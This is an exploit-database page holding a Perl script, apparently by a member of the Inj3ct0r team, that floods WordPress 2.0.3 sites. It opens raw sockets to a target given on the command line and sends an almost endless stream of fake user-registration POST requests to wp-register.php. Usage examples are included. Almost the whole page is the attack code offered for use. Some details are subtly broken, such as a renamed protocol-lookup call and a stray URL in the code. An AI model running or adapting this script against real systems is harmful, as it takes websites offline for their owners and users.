WordPress 2.0.3 Denial of Service Exploits



EKU-ID: 1141 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-10-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/perl
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
#
# Exploit Title: WordPress 2.0.3 Denial of Service Exploits
# Author: Angel Injection
# Home: http://1337day.com
# Thanks To: All Members Inj3ct0r Team
#
#########################################################################
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; http://
for ($i=0; $i<100000000000000000000000000000000000000000000000000000000000000000000000000000000000000; $i++)
{
$user="\x41\x42\x43\x44\x45\x46\x47\x48\x49\x50\x51\x52\x53\x54\x56\x56\x57\x58\x59".$rand.$i;
$data = "action=register&user_login=$user&user_email=$user\@inj3ct0r&submit=Register+%C2%BB";
$len = length $data;
$angel = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
               "Accept: */*\r\n".
               "Accept-Language: en-gb\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Accept-Encoding: gzip, deflate\r\n".
               "User-Agent: Mozilla/5.0 Linux Inj3ct0r 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux)\r\n".
               "Host: $host\r\n".
               "Content-Length: $len\r\n".
               "Connection: Keep-Alive\r\n".
               "Cache-Control: no-cache\r\n\r\n".
 "$data";
     my $port = "80";
     my $inj3ct0r = getinj3ct0r('tcp');
     socket(SOCKET, PF_INET, SOCK_STREAM, $inj3ct0r);
     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
     send(SOCKET,"$angel", 0);
     syswrite STDOUT, "+";
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 192.168.1.1 /wp/\n";
print "\tex2: $0 192.168.1.1 /\n";
exit();
};